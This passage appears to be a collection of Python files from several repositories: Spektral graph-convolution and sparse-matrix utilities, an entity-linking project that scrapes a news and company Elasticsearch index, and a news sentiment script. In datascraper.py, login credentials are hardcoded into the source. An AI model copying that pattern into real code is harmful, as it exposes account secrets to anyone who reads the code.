num_diffusion_steps=self.K,
kernel_initializer=self.kernel_initializer,
kernel_regularizer=self.kernel_regularizer,
kernel_constraint=self.kernel_constraint,
)
for _ in range(self.channels)
]
def apply_filters(self, x, a):
# This will be a list of channels diffused features.
# Each diffused feature is a (batch, n_nodes, 1) tensor.
# Later we will concat all the features to get one
# (batch, n_nodes, channels) diffused graph signal
diffused_features = []
# Iterating over all channels diffusion filters
for diffusion in self.filters:
diffused_feature = diffusion((x, a))
diffused_features.append(diffused_feature)
return tf.concat(diffused_features, -1)
def call(self, inputs, mask=None):
x, a = inputs
output = self.apply_filters(x, a)
if mask is not None:
output *= mask[0]
output = self.activation(output)
return output
@property
def config(self):
return {"channels": self.channels, "K": self.K - 1}
@staticmethod
def preprocess(a):
return gcn_filter(a)
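# Illustrative usage sketch (toy shapes, not part of the original module):
#
#   import numpy as np
#   a = np.random.randint(0, 2, (5, 5)).astype(float)
#   a_norm = DiffusionConv.preprocess(a)             # normalized adjacency
#   x = tf.random.normal((1, 5, 8))                  # (batch, n_nodes, features)
#   conv = DiffusionConv(channels=4, K=3)
#   out = conv([x, tf.convert_to_tensor(a_norm[None, ...])])   # (1, 5, 4)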
```
#### File: layers/ops/matmul.py
```python
import tensorflow as tf
from tensorflow.keras import backend as K
from tensorflow.python.ops.linalg.sparse import sparse as tfsp
from . import ops
def dot(a, b):
"""
Computes a @ b, for a, b of the same rank (both 2 or both 3).
If the rank is 2, then the innermost dimension of `a` must match the
outermost dimension of `b`.
If the rank is 3, the first dimension of `a` and `b` must be equal and the
function computes a batch matmul.
Supports both dense and sparse multiplication (including sparse-sparse).
:param a: Tensor or SparseTensor with rank 2 or 3.
:param b: Tensor or SparseTensor with same rank as b.
:return: Tensor or SparseTensor with rank 2 or 3.
"""
a_ndim = K.ndim(a)
b_ndim = K.ndim(b)
    assert a_ndim == b_ndim, "Expected equal ranks, got {} and {}".format(
        a_ndim, b_ndim
    )
a_is_sparse = K.is_sparse(a)
b_is_sparse = K.is_sparse(b)
# Handle cases: rank 2 sparse-dense, rank 2 dense-sparse
# In these cases we can use the faster sparse-dense matmul of tf.sparse
if a_ndim == 2:
if a_is_sparse and not b_is_sparse:
return tf.sparse.sparse_dense_matmul(a, b)
if not a_is_sparse and b_is_sparse:
return ops.transpose(
tf.sparse.sparse_dense_matmul(ops.transpose(b), ops.transpose(a))
)
# Handle cases: rank 2 sparse-sparse, rank 3 sparse-dense,
# rank 3 dense-sparse, rank 3 sparse-sparse
# In these cases we can use the tfsp.CSRSparseMatrix implementation (slower,
# but saves memory)
if a_is_sparse:
a = tfsp.CSRSparseMatrix(a)
if b_is_sparse:
b = tfsp.CSRSparseMatrix(b)
if a_is_sparse or b_is_sparse:
out = tfsp.matmul(a, b)
if hasattr(out, "to_sparse_tensor"):
return out.to_sparse_tensor()
else:
return out
# Handle case: rank 2 dense-dense, rank 3 dense-dense
# Here we use the standard dense operation
return tf.matmul(a, b)
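# Illustrative sketch (assumed toy tensors, not part of the original file):
# mixing a sparse adjacency with dense features via dot().
#
#   a = tf.sparse.from_dense(tf.eye(3))    # rank-2 SparseTensor
#   b = tf.random.normal((3, 4))           # rank-2 dense Tensor
#   out = dot(a, b)                        # sparse-dense matmul, shape (3, 4)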
def mixed_mode_dot(a, b):
"""
Computes the equivalent of `tf.einsum('ij,bjk->bik', a, b)`, but
works for both dense and sparse inputs.
:param a: Tensor or SparseTensor with rank 2.
:param b: Tensor or SparseTensor with rank 3.
:return: Tensor or SparseTensor with rank 3.
"""
shp = K.int_shape(b)
b_t = ops.transpose(b, (1, 2, 0))
b_t = ops.reshape(b_t, (shp[1], -1))
output = dot(a, b_t)
output = ops.reshape(output, (shp[1], shp[2], -1))
output = ops.transpose(output, (2, 0, 1))
return output
def modal_dot(a, b, transpose_a=False, transpose_b=False):
"""
Computes the matrix multiplication of a and b, handling the data modes
automatically.
This is a wrapper to standard matmul operations, for a and b with rank 2
or 3, that:
- Supports automatic broadcasting of the "batch" dimension if the two inputs
have different ranks.
- Supports any combination of dense and sparse inputs.
This op is useful for multiplying matrices that represent batches of graphs
in the different modes, for which the adjacency matrices may or may not be
sparse and have different ranks from the node attributes.
Additionally, it can also support the case where we have many adjacency
matrices and only one graph signal (which is uncommon, but may still happen).
If you know a-priori the type and shape of the inputs, it may be faster to
use the built-in functions of TensorFlow directly instead.
Examples:
- `a` rank 2, `b` rank 2 -> `a @ b`
- `a` rank 3, `b` rank 3 -> `[a[i] @ b[i] for i in range(len(a))]`
- `a` rank 2, `b` rank 3 -> `[a @ b[i] for i in range(len(b))]`
- `a` rank 3, `b` rank 2 -> `[a[i] @ b for i in range(len(a))]`
:param a: Tensor or SparseTensor with rank 2 or 3;
:param b: Tensor or SparseTensor with rank 2 or 3;
:param transpose_a: transpose the innermost 2 dimensions of `a`;
:param transpose_b: transpose the innermost 2 dimensions of `b`;
:return: Tensor or SparseTensor with rank = max(rank(a), rank(b)).
"""
a_ndim = K.ndim(a)
b_ndim = K.ndim(b)
assert a_ndim in (2, 3), "Expected a of rank 2 or 3, got {}".format(a_ndim)
assert b_ndim in (2, 3), "Expected b of rank 2 or 3, got {}".format(b_ndim)
if transpose_a:
perm = None if a_ndim == 2 else (0, 2, 1)
a = ops.transpose(a, perm)
if transpose_b:
perm = None if b_ndim == 2 else (0, 2, 1)
b = ops.transpose(b, perm)
if a_ndim == b_ndim:
# ...ij,...jk->...ik
return dot(a, b)
elif a_ndim == 2:
# ij,bjk->bik
return mixed_mode_dot(a, b)
else: # a_ndim == 3
# bij,jk->bik
if not K.is_sparse(a) and not K.is_sparse(b):
# Immediately fallback to standard dense matmul, no need to reshape
return tf.matmul(a, b)
# If either input is sparse, we use dot(a, b)
# This implementation is faster than using rank 3 sparse matmul with tfsp
a_shape = tf.shape(a)
b_shape = tf.shape(b)
a_flat = ops.reshape(a, (-1, a_shape[2]))
output = dot(a_flat, b)
return ops.reshape(output, (-1, a_shape[1], b_shape[1]))
def matmul_at_b_a(a, b):
"""
Computes a.T @ b @ a, for a, b with rank 2 or 3.
Supports automatic broadcasting of the "batch" dimension if the two inputs
have different ranks.
Supports any combination of dense and sparse inputs.
:param a: Tensor or SparseTensor with rank 2 or 3.
:param b: Tensor or SparseTensor with rank 2 or 3.
:return: Tensor or SparseTensor with rank = max(rank(a), rank(b)).
"""
at_b = modal_dot(a, b, transpose_a=True)
at_b_a = modal_dot(at_b, a)
return at_b_a
def matrix_power(a, k):
"""
If a is a square matrix, computes a^k. If a is a rank 3 Tensor of square
matrices, computes the exponent of each inner matrix.
:param a: Tensor or SparseTensor with rank 2 or 3. The innermost two
dimensions must be the same.
:param k: int, the exponent to which to raise the matrices.
:return: Tensor or SparseTensor with same rank as the input.
"""
x_k = a
for _ in range(k - 1):
x_k = modal_dot(a, x_k)
return x_k
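# Illustrative note (not part of the original file): matrix_power(a, 3)
# computes modal_dot(a, modal_dot(a, a)), i.e. a @ a @ a for a rank-2 input,
# applied to each inner matrix for a rank-3 input.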
```
#### File: layers/ops/sparse.py
```python
import tensorflow as tf
from tensorflow.python.ops import gen_sparse_ops
from . import ops
def add_self_loops(a, fill=1.0):
"""
Adds self-loops to the given adjacency matrix. Self-loops are added only for
those node that don't have a self-loop already, and are assigned a weight
of `fill`.
:param a: a square SparseTensor.
:param fill: the fill value for the new self-loops. It will be cast to the
dtype of `a`.
:return: a SparseTensor with the same shape as the input.
"""
indices = a.indices
values = a.values
N = tf.shape(a, out_type=indices.dtype)[0]
mask_od = indices[:, 0] != indices[:, 1]
mask_sl = ~mask_od
mask_od.set_shape([None]) # For compatibility with TF 2.2
mask_sl.set_shape([None])
indices_od = indices[mask_od]
indices_sl = indices[mask_sl]
values_sl = tf.fill((N,), tf.cast(fill, values.dtype))
values_sl = tf.tensor_scatter_nd_update(
values_sl, indices_sl[:, 0:1], values[mask_sl]
)
indices_sl = tf.range(N, dtype=indices.dtype)[:, None]
indices_sl = tf.repeat(indices_sl, 2, -1)
indices = tf.concat((indices_od, indices_sl), 0)
values_od = values[mask_od]
values = tf.concat((values_od, values_sl), 0)
out = tf.SparseTensor(indices, values, (N, N))
return tf.sparse.reorder(out)
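# Illustrative example (assumed toy input, not part of the original file):
#
#   a = tf.sparse.from_dense(tf.constant([[0., 1.], [0., 0.]]))
#   a = add_self_loops(a)          # diagonal entries (0, 0) and (1, 1) now 1.0
#   tf.sparse.to_dense(a)          # [[1., 1.], [0., 1.]]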
def add_self_loops_indices(indices, n_nodes=None):
"""
Given the indices of a square SparseTensor, adds the diagonal entries (i, i)
and returns the reordered indices.
:param indices: Tensor of rank 2, the indices to a SparseTensor.
:param n_nodes: the size of the n_nodes x n_nodes SparseTensor indexed by
the indices. If `None`, n_nodes is calculated as the maximum entry in the
indices plus 1.
:return: Tensor of rank 2, the indices to a SparseTensor.
"""
n_nodes = tf.reduce_max(indices) + 1 if n_nodes is None else n_nodes
row, col = indices[..., 0], indices[..., 1]
mask = tf.ensure_shape(row != col, row.shape)
sl_indices = tf.range(n_nodes, dtype=row.dtype)[:, None]
sl_indices = tf.repeat(sl_indices, 2, -1)
indices = tf.concat((indices[mask], sl_indices), 0)
dummy_values = tf.ones_like(indices[:, 0])
indices, _ = gen_sparse_ops.sparse_reorder(
indices, dummy_values, (n_nodes, n_nodes)
)
return indices
def _square_size(dense_shape):
dense_shape = tf.unstack(dense_shape)
size = dense_shape[0]
for d in dense_shape[1:]:
tf.debugging.assert_equal(size, d)
return size
def _indices_to_inverse_map(indices, size):
"""
Compute inverse indices of a gather.
:param indices: Tensor, forward indices, rank 1
:param size: Tensor, size of pre-gathered input, rank 0
:return: Tensor, inverse indices, shape [size]. Zero values everywhere
except at indices.
"""
indices = tf.cast(indices, tf.int64)
size = tf.cast(size, tf.int64)
return tf.scatter_nd(
tf.expand_dims(indices, axis=-1),
tf.range(tf.shape(indices, out_type=tf.int64)[0]),
tf.expand_dims(size, axis=-1),
)
def _boolean_mask_sparse(a, mask, axis, inverse_map, out_size):
"""
SparseTensor equivalent to tf.boolean_mask.
:param a: SparseTensor of rank k and nnz non-zeros.
:param mask: rank-1 bool Tensor.
:param axis: int, axis on which to mask. Must be in [-k, k).
    :param out_size: number of true entries in mask. Computed if not given.
:return masked_a: SparseTensor masked along the given axis.
:return values_mask: bool Tensor indicating surviving edges, shape [nnz].
"""
mask = tf.convert_to_tensor(mask)
values_mask = tf.gather(mask, a.indices[:, axis], axis=0)
dense_shape = tf.tensor_scatter_nd_update(a.dense_shape, [[axis]], [out_size])
indices = tf.boolean_mask(a.indices, values_mask)
indices = tf.unstack(indices, axis=-1)
indices[axis] = tf.gather(inverse_map, indices[axis])
indices = tf.stack(indices, axis=-1)
a = tf.SparseTensor(
indices,
tf.boolean_mask(a.values, values_mask),
dense_shape,
)
return (a, values_mask)
def _boolean_mask_sparse_square(a, mask, inverse_map, out_size):
"""
Apply boolean_mask to every axis of a SparseTensor.
:param a: SparseTensor with uniform dimensions and nnz non-zeros.
:param mask: boolean mask.
:param inverse_map: Tensor of new indices, shape [nnz]. Computed if None.
    :param out_size: number of True values in mask. Computed if None.
:return a: SparseTensor with uniform dimensions.
:return values_mask: bool Tensor of shape [nnz] indicating valid edges.
"""
mask = tf.convert_to_tensor(mask)
values_mask = tf.reduce_all(tf.gather(mask, a.indices, axis=0), axis=-1)
dense_shape = [out_size] * a.shape.ndims
indices = tf.boolean_mask(a.indices, values_mask)
indices = tf.gather(inverse_map, indices)
a = tf.SparseTensor(indices, tf.boolean_mask(a.values, values_mask), dense_shape)
return (a, values_mask)
def boolean_mask_sparse(a, mask, axis=0):
"""
SparseTensor equivalent to tf.boolean_mask.
:param a: SparseTensor of rank k and nnz non-zeros.
:param mask: rank-1 bool Tensor.
:param axis: int, axis on which to mask. Must be in [-k, k).
:return masked_a: SparseTensor masked along the given axis.
:return values_mask: bool Tensor indicating surviving values, shape [nnz].
"""
i = tf.squeeze(tf.where(mask), axis=1)
out_size = tf.math.count_nonzero(mask)
in_size = a.dense_shape[axis]
inverse_map = _indices_to_inverse_map(i, in_size)
return _boolean_mask_sparse(
a, mask, axis=axis, inverse_map=inverse_map, out_size=out_size
)
def boolean_mask_sparse_square(a, mask):
"""
Apply mask to every axis of SparseTensor a.
:param a: SparseTensor, square, nnz non-zeros.
:param mask: boolean mask with size equal to each dimension of a.
:return masked_a: SparseTensor
:return values_mask: bool tensor of shape [nnz] indicating valid values.
"""
i = tf.squeeze(tf.where(mask), axis=-1)
out_size = tf.size(i)
in_size = _square_size(a.dense_shape)
inverse_map = _indices_to_inverse_map(i, in_size)
return _boolean_mask_sparse_square(
a, mask, inverse_map=inverse_map, out_size=out_size
)
def gather_sparse(a, indices, axis=0, mask=None):
"""
SparseTensor equivalent to tf.gather, assuming indices are sorted.
:param a: SparseTensor of rank k and nnz non-zeros.
:param indices: rank-1 int Tensor, rows or columns to keep.
:param axis: int axis to apply gather to.
:param mask: boolean mask corresponding to indices. Computed if not provided.
:return gathered_a: SparseTensor masked along the given axis.
:return values_mask: bool Tensor indicating surviving values, shape [nnz].
"""
in_size = _square_size(a.dense_shape)
out_size = tf.size(indices)
if mask is None:
mask = ops.indices_to_mask(indices, in_size)
inverse_map = _indices_to_inverse_map(indices, in_size)
return _boolean_mask_sparse(
a, mask, axis=axis, inverse_map=inverse_map, out_size=out_size
)
def gather_sparse_square(a, indices, mask=None):
"""
Gather on every axis of a SparseTensor.
:param a: SparseTensor of rank k and nnz non-zeros.
:param indices: rank-1 int Tensor, rows and columns to keep.
:param mask: boolean mask corresponding to indices. Computed if not provided.
:return gathered_a: SparseTensor of the gathered input.
:return values_mask: bool Tensor indicating surviving values, shape [nnz].
"""
in_size = _square_size(a.dense_shape)
out_size = tf.size(indices)
if mask is None:
mask = ops.indices_to_mask(indices, in_size)
inverse_map = _indices_to_inverse_map(indices, in_size)
return _boolean_mask_sparse_square(
a, mask, inverse_map=inverse_map, out_size=out_size
)
```
#### File: spektral/transforms/clustering_coefficient.py
```python
import networkx as nx
import numpy as np
class ClusteringCoeff:
"""
Concatenates to each node attribute the clustering coefficient of the
corresponding node.
"""
def __call__(self, graph):
if "a" not in graph:
raise ValueError("The graph must have an adjacency matrix")
clustering_coeff = nx.clustering(nx.Graph(graph.a))
clustering_coeff = np.array(
[clustering_coeff[i] for i in range(graph.n_nodes)]
)[:, None]
if "x" not in graph:
graph.x = clustering_coeff
else:
graph.x = np.concatenate((graph.x, clustering_coeff), axis=-1)
return graph
```
#### File: spektral/transforms/normalize_sphere.py
```python
import numpy as np
class NormalizeSphere:
r"""
Normalizes the node attributes so that they are centered at the origin and
contained within a sphere of radius 1:
$$
\X_{i} \leftarrow \frac{\X_{i} - \bar\X}{\max_{i,j} \X_{ij}}
$$
where \( \bar\X \) is the centroid of the node features.
"""
def __call__(self, graph):
offset = np.mean(graph.x, -2, keepdims=True)
scale = np.abs(graph.x).max()
graph.x = (graph.x - offset) / scale
return graph
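# Illustrative sketch (toy graph object assumed, not part of the original
# module):
#
#   g.x = np.array([[0., 2.], [2., 0.]])
#   g = NormalizeSphere()(g)       # centroid removed, scaled by max |x|
#   # g.x is now [[-0.5, 0.5], [0.5, -0.5]]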
```
#### File: tests/test_models/test_general_gnn.py
```python
from spektral import models
from tests.test_models.core import MODES, run_model
config = {
"model": models.GeneralGNN,
"modes": [MODES["SINGLE"], MODES["DISJOINT"], MODES["MIXED"]],
"kwargs": {"output": 32, "connectivity": "cat", "pool": "sum"},
"edges": False,
"dense": False,
"sparse": True,
}
def test_model():
run_model(config)
config["kwargs"]["pool"] = None
run_model(config)
config["kwargs"]["connectivity"] = "sum"
run_model(config)
config["kwargs"]["connectivity"] = None
run_model(config)
``` |
{
"source": "JonaBenja/el_for_cnd",
"score": 3
} |
#### File: el_for_cnd/src/datascraper.py
```python
from elasticsearch import Elasticsearch
from elasticsearch.helpers import scan
import pandas as pd
def scrape_companies(es):
"""Function to scrape KvK numbers and additional information from companies"""
# Prepare variables
es_index = "nen-pilot-companies"
nen_companies = []
    # Do not exclude any queries
es_query = {"query": {"match_all": {}}}
# Save every company entry from the scrape in a list
for hit in scan(es, index=es_index, query=es_query):
nen_companies.append(hit['_source'])
# Transform result in pandas DataFrame
nen_companies = pd.DataFrame(nen_companies)
print(f"Scraped {len(nen_companies)} companies")
return nen_companies
def scrape_news(es):
"""Function to scrape news articles and metadata"""
# Prepare variables
es_index = "nen-pilot-news"
nen_news = []
# Specify query for scraping the news articles
es_query = {"query": {
"bool": {
"must": [],
"filter": [
{
"match_all": {}
},
{
"exists": {
# Take news articles that include organizations
"field": "resolved_orgs.keyword"
}
},
{
"exists": {
# Make sure the full text of the article is available
"field": "full_text",
}
},
{ # Make sure the title of the article is available
"exists": {
"field": "title",
}
},
{
"match_phrase": {
"language.keyword": {
# Take only Dutch articles
"query": "nl"
}
}
},
{
"range": {
"publish_date": {
# Take only recent articles
"format": "strict_date_optional_time",
"gte": "2021-01-06T16:16:38.151Z",
"lte": "2021-04-06T15:16:38.151Z"
}
}
}
],
"should": [],
"must_not": []
}}}
# Add all relevant news articles to list
for hit in scan(es, index=es_index, query=es_query):
nen_news.append(hit['_source'])
# Transform list into pandas DataFrame
nen_news = pd.DataFrame(nen_news)
print(f"Scraped {nen_news.shape[0]} news articles")
return nen_news
def main():
# Set up Elastic Search
es = Elasticsearch(
["https://search.brainial.com/"],
http_auth=("esuser", "ww_2<PASSWORD>"),
scheme="https",
port=443,
)
# Scrape company information and save it as a tsv file
nen_companies = scrape_companies(es)
nen_companies.to_csv('../../data/model_data/nen_companies.tsv', sep='\t')
# Scrape news articles and save them as a tsv file
nen_news = scrape_news(es)
nen_news.to_csv('../../data/model_data/nen_news.tsv', sep='\t')
if __name__ == '__main__':
main()
```
#### File: el_for_cnd/src/data_statistics.py
```python
from utils import *
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from collections import Counter
import csv
import spacy
from spacy.kb import KnowledgeBase
import seaborn as sns
def count_mentions(articles, nlp):
"""Function to count the number of organization mentions in the news articles"""
# Prepare variables
n_articles = 0
n_mentions = 0
n_org_articles = 0
n_org_mentions = 0
i = 0
# Go through all news articles
for article in articles:
i += 1
        # Print progress
        if i % 100 == 0:
print(f"{i} articles counted.")
# Transform article to spaCy doc
doc = nlp(article)
# Count all unique named entities
entities = set([ent.text for ent in doc.ents])
if entities:
n_mentions += len(entities)
n_articles += 1
# Count all unique organizations
org_entities = set([ent.text for ent in doc.ents if ent.label_ in ['ORG', 'NORP']])
if org_entities:
n_org_mentions += len(org_entities)
n_org_articles += 1
# Print statistics
print(f"{i} articles in total.")
print(f"{n_mentions} named entities in {n_articles} articles.")
print(f"{n_org_mentions} campany mentions in {n_org_articles} articles.")
def get_statistics():
"""Function to load data and execute the count mentions function"""
nlp = spacy.load('../resources/nen_nlp')
news = pd.read_csv('../data/model_data/prepro_news.tsv', sep='\t')
count_mentions(news['full_text'], nlp)
def get_distribution():
"""Function to plot the number times a KvK-number occurs in the data"""
# Load data
training_data = "../data/model_data/all_data.tsv"
training_df = pd.read_csv(training_data, sep='\t')
# Extract all KvK-numbers
orgs = [org for org in training_df['label'] if org != 'NIL']
#orgs = ['0'+org for org in orgs if len(org) == 7]
# Count their occurrences and extract the 20 most common
org_count = Counter(orgs)
most_orgs = org_count.most_common(20)
orgis = []
percs = []
# Save the first name of the companies that belong to the KvK-numbers
entity_loc = "../data/model_data/entities.tsv"
id_dict = dict()
with open(entity_loc, "r", encoding="utf8") as csvfile:
csvreader = csv.reader(csvfile, delimiter="\t")
for row in csvreader:
id_dict[row[0]] = (row[1], row[2], row[3])
# Transform numbers into percentages
for org, count in most_orgs:
orgis.append(f"{id_dict[str(org)][0]} ({org})")
perc = count/len(orgs)*100
percs.append(perc)
# Create barplot
df = pd.DataFrame(list(zip(orgis, percs)),
columns=['Company', 'Percentage of annotations'])
sns.barplot(y='Company', x='Percentage of annotations', data=df)
plt.show()
"""
sns.set(color_codes=True)
x = 'org'
(training_df
.groupby(x)[y]
.value_counts(normalize=True)
.mul(100)
.rename('percent')
.reset_index()
.pipe((sns.catplot, 'data'), x=x, y='percent', hue=y, kind='bar'))
#plt.show()
"""
def evaluation_graph():
"""Creates a plot showing the scores on the test set"""
system = ["Entity Linker", "baseline", "baseline+context"]
accuracy = [0.800, 0.599, 0.571]
f_score = [0.379, 0.300, 0.289]
x = np.arange(len(system)) # the label locations
width = 0.35 # the width of the bars
fig, ax = plt.subplots()
rects1 = ax.bar(x - width / 2, accuracy, width, label='micro F-score', color='#2e79ff')
rects2 = ax.bar(x + width / 2, f_score, width, label='macro F-score', color='#abc9ff')
hfont = {'fontname': 'Helvetica'}
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('Scores', **hfont)
ax.set_title('Results on development set', **hfont)
ax.set_xticks(x)
ax.set_ylim([0, 1])
ax.set_xticklabels(system, **hfont)
ax.legend()
ax.bar_label(rects1, padding=3)
ax.bar_label(rects2, padding=3)
fig.tight_layout()
plt.show()
def n_candidates():
"""Creates a plot showing the number of samples and the number of candidates"""
# Load data and resources
data = "../data/model_data/all_data.tsv"
data = pd.read_csv(data, sep='\t')
orgs = data['org']
nlp = spacy.load('resources/nen_nlp')
new_kb = KnowledgeBase(vocab=nlp.vocab, entity_vector_length=96)
new_kb.load_bulk('resources/kb_probs')
# Count the number of candidates per alias
n_cands = []
for org in orgs:
candids = new_kb.get_candidates(org)
n_cands.append(len(candids))
# Plot the number of mentions and the number of candidates
data_candids = pd.DataFrame(n_cands, columns=['n_of_candidates'])
sns.countplot(x='n_of_candidates', data=data_candids)
plt.show()
def main():
get_statistics()
get_distribution()
evaluation_graph()
#n_candidates()
if __name__ == '__main__':
main()
```
#### File: el_for_cnd/src/iaa-annotations.py
```python
import json
import jsonlines
import spacy
from spacy.kb import KnowledgeBase
def save_500():
    """Save a sample of annotations that have more than one KB candidate,
    to be used as input for the inter-annotator agreement (IAA) study."""
    # Prepare datafiles
json_loc = "../../data/prodigy_data/annotations_input.jsonl"
new_loc = "../../data/prodigy_data/iaa_input.jsonl"
# Prepare resources
nlp = spacy.load('../resources/nen_nlp')
kb = KnowledgeBase(vocab=nlp.vocab, entity_vector_length=96)
kb.load_bulk('../resources/kb_initial')
i = 0
j = 0
unique_orgs = []
limit = 400
# Open file to save IAA-annotations in
outfile = jsonlines.open(new_loc, 'w')
# Go through all annotations
with open(json_loc, 'r', encoding='utf8') as jsonfile:
for line in jsonfile:
example = json.loads(line)
org = example['org']
if len(kb.get_candidates(org)) > 1:
i += 1
if i > 4070 and org not in unique_orgs and j < limit:
j += 1
outfile.write(example)
unique_orgs.append(org)
print(j, ", sample: ", i)
outfile.close()
print(f"{limit} IAA-annotations Prodigy input saved in ../prodigy/iaa_input.jsonl")
def main():
save_500()
if __name__ == '__main__':
main()
```
#### File: el_for_cnd/src/probs_kb.py
```python
import spacy
from spacy.kb import KnowledgeBase
from collections import defaultdict
def get_prior_probs(candidates, alias_dict):
"""
Get prior probabilities of all candidates for a mention
:param candidates: the list of candidates for a company mention
    :param alias_dict: mapping from entity id to the number of times it was
    annotated as the referent of this mention
    :return: the list of candidate entity ids and their prior probabilities
"""
prior_probs = []
candids = []
total = sum(alias_dict[cand] for cand in alias_dict)
for cand in candidates:
if cand in alias_dict:
prob = alias_dict[cand] / total
else:
prob = 0
candids.append(cand)
prior_probs.append(prob)
return candids, prior_probs
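# Worked example (illustrative numbers, not from the original file): if
# alias_dict counts entity "123" three times and entity "456" once, then
# total = 4 and get_prior_probs(["123", "456", "789"], alias_dict) returns
# probabilities [0.75, 0.25, 0.0] -- a candidate never seen in the
# annotations gets prior probability 0.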
def add_aliases(cands_dict, old_kb, new_kb):
    for alias in old_kb.get_alias_strings():
        candids = old_kb.get_candidates(alias)
        candidates = [cand.entity_ for cand in candids]
        if alias in cands_dict:
            candidates, prior_probs = get_prior_probs(candidates, cands_dict[alias])
        else:
            # Fall back to the prior probabilities stored in the old KB, so
            # that prior_probs is always defined before add_alias is called
            prior_probs = [old_kb.get_prior_prob(cand.entity_, alias) for cand in candids]
        new_kb.add_alias(alias, candidates, prior_probs)
    return new_kb
def save_candidates(datapath):
"""
:param datapath: path to all data
:return:
"""
cands_dict = dict()
i = 0
with open(datapath, 'r', encoding='utf8') as infile:
for line in infile:
line = line.replace('\n', '').split('\t')
if line[0] != 'context' and line[-1] != 'NIL':
if i % 100 == 0:
print(f"{i} samples preprocessed.")
i += 1
alias = line[2]
entity = line[-1]
if alias not in cands_dict:
cands_dict[alias] = defaultdict(int)
cands_dict[alias][entity] += 1
return cands_dict
def redefine_kb():
"""
:return:
"""
    # Prepare resources
nlp = spacy.load('resources/nen_nlp')
old_kb = KnowledgeBase(vocab=nlp.vocab, entity_vector_length=96)
old_kb.load_bulk('resources/kb_initial')
    # Create new Knowledge Base, with the entities from the company database
new_kb = KnowledgeBase(vocab=nlp.vocab, entity_vector_length=96)
new_kb.load_bulk('resources/kb_entities')
# Load data
datapath = "../data/model_data/all_data.tsv"
# Find candidates and number of occurrences
cands_dict = save_candidates(datapath)
# Add aliases to KB
new_kb = add_aliases(cands_dict, old_kb, new_kb)
print(f"Added {new_kb.get_size_aliases()} aliases to KB and their prior probabilities.")
# Save new KB
new_kb.dump("../resources/kb_probs")
def main():
redefine_kb()
if __name__ == "__main__":
main()
``` |
{
"source": "JonaBenja/lad-assignment1",
"score": 3
} |
#### File: lad-assignment1/code/sentiment.py
```python
from polyglot.text import Text
from statistics import mean
import pandas as pd
from collections import defaultdict, Counter
import matplotlib.pyplot as plt
import numpy as np
"""
DUTCH
"""
# Prepare dictionaries
sents_sentiment = defaultdict(list)
# Read in data
tsv_file = "../data/nl/decoded_nl_greta_overview.tsv"
content = pd.read_csv(tsv_file, sep="\t", keep_default_na=False, header=0, encoding = 'utf-8')
articles = content['Text']
publishers = content['Publisher']
# Save mean sentiment of sentences per article
for text, publisher in zip(articles, publishers):
text = ''.join(x for x in text if x.isprintable())
sentences = Text(text, hint_language_code = 'nl').sentences
sent_senti = float(mean([sent.polarity for sent in sentences]))
sents_sentiment[publisher].append(sent_senti)
art_pub_sent = defaultdict(dict)
for publisher in sents_sentiment:
art_pub_sent[publisher] = mean(sents_sentiment[publisher])
d = sents_sentiment
top10_publishers = sorted(d, key=lambda k: len(d[k]), reverse=True)[:10]
publishers = top10_publishers
sentiment = [art_pub_sent[publisher] for publisher in top10_publishers]
x = np.arange(len(publishers)) # the label locations
width = 0.50 # the width of the bars
fig, ax = plt.subplots(1, 1, figsize = (16, 6))
rects1 = ax.bar(x - width/2, sentiment, width, label='Sentiment')
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('SENTIMENT')
ax.set_xlabel('PUBLISHER')
ax.set_title('MEAN ARTICLE SENTIMENT OF DUTCH PUBLISHERS')
ax.set_xticks(x)
ax.set_xticklabels(publishers)
def autolabel(rects):
"""Attach a text label above each bar in *rects*, displaying its height."""
for rect, publisher in zip(rects, top10_publishers):
label = len(sents_sentiment[publisher])
height = rect.get_height()
ax.annotate('{}'.format(label),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
autolabel(rects1)
fig.tight_layout()
plt.show()
fig.savefig("../data/plots/nl_publisher_sentiment.png")
"""
ITALIAN
"""
sents_sentiment = defaultdict(list)
tsv_file = "../data/it/it_greta_overview.tsv"
content = pd.read_csv(tsv_file, sep="\t", keep_default_na=False, header=0, encoding = 'utf-8')
articles = content['Text']
publishers = content['Publisher']
# Save mean sentiment of sentences per article
for text, publisher in zip(articles, publishers):
if publisher == 'la Repubblica':
publisher = 'La Repubblica'
text = ''.join(x for x in text if x.isprintable())
sentences = Text(text, hint_language_code = 'it').sentences
sent_senti = float(mean([sent.polarity for sent in sentences]))
sents_sentiment[publisher].append(sent_senti)
art_pub_sent = defaultdict(dict)
for publisher in sents_sentiment:
art_pub_sent[publisher] = mean(sents_sentiment[publisher])
d = sents_sentiment
top10_publishers = sorted(d, key=lambda k: len(d[k]), reverse=True)[:10]
"""
SENTIMENT PLOT
"""
publishers = top10_publishers
sentiment = [art_pub_sent[publisher] for publisher in top10_publishers]
x = np.arange(len(publishers)) # the label locations
width = 0.50 # the width of the bars
fig, ax = plt.subplots(1, 1, figsize = (16, 6))
rects1 = ax.bar(x - width/2, sentiment, width, label='Sentiment')
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('SENTIMENT')
ax.set_xlabel('PUBLISHER')
ax.set_title('MEAN ARTICLE SENTIMENT OF ITALIAN PUBLISHERS')
ax.set_xticks(x)
ax.set_xticklabels(publishers)
def autolabel(rects):
"""Attach a text label above each bar in *rects*, displaying its height."""
for rect, publisher in zip(rects, top10_publishers):
label = len(sents_sentiment[publisher])
height = rect.get_height()
ax.annotate('{}'.format(label),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
autolabel(rects1)
fig.tight_layout()
plt.show()
fig.savefig("../data/plots/it_publisher_sentiment.png")
```
#### File: lad-assignment1/code/util_html.py
```python
import requests
import re
from bs4 import BeautifulSoup
def url_to_string(url):
"""
Extracts the raw text from a web page.
It takes a URL string as input and returns the text.
"""
parser_content = url_to_html(url)
return html_to_string(parser_content)
def html_to_string(parser_content):
"""Extracts the textual content from an html object."""
# Remove scripts
for script in parser_content(["script", "style", "aside"]):
script.extract()
# This is a shorter way to write the code for removing the newlines.
# It does it in one step without intermediate variables
return " ".join(re.split(r'[\n\t]+', parser_content.get_text()))
def url_to_html(url):
"""Scrapes the html content from a web page. Takes a URL string as input and returns an html object. """
# Get the html content
res = requests.get(url, headers={"User-Agent": "XY"})
html = res.text
